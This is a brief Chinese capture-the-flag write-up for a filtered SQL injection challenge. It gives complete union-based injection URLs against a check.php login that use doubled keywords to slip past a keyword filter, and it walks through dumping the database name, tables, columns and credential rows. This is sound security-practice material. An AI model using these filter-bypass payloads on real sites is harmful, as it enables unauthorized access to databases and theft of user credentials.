这题界面和上一题easysql没多大区别，他说做了很多过滤

使用burpsuite fuzz一下

可以看出有很多词被过滤了
尝试双写注入
首先order by 得到有三列
然后爆数据库名

/check.php?username=1' uniunionon selselectect 1,2,database()%23&password=123

爆表名

/check.php?username=1' uniunionon selselectect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables whwhereere table_schema=database()%23&password=123

爆字段

/check.php?username=1' uniunionon selselectect 1,2,group_concat(column_name) ffromrom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql'%23&password=123

爆数据

/check.php?username=1' uniunionon selselectect 1,2,group_concat(id,username,password) ffromrom b4bsql%23&password=123

得到flag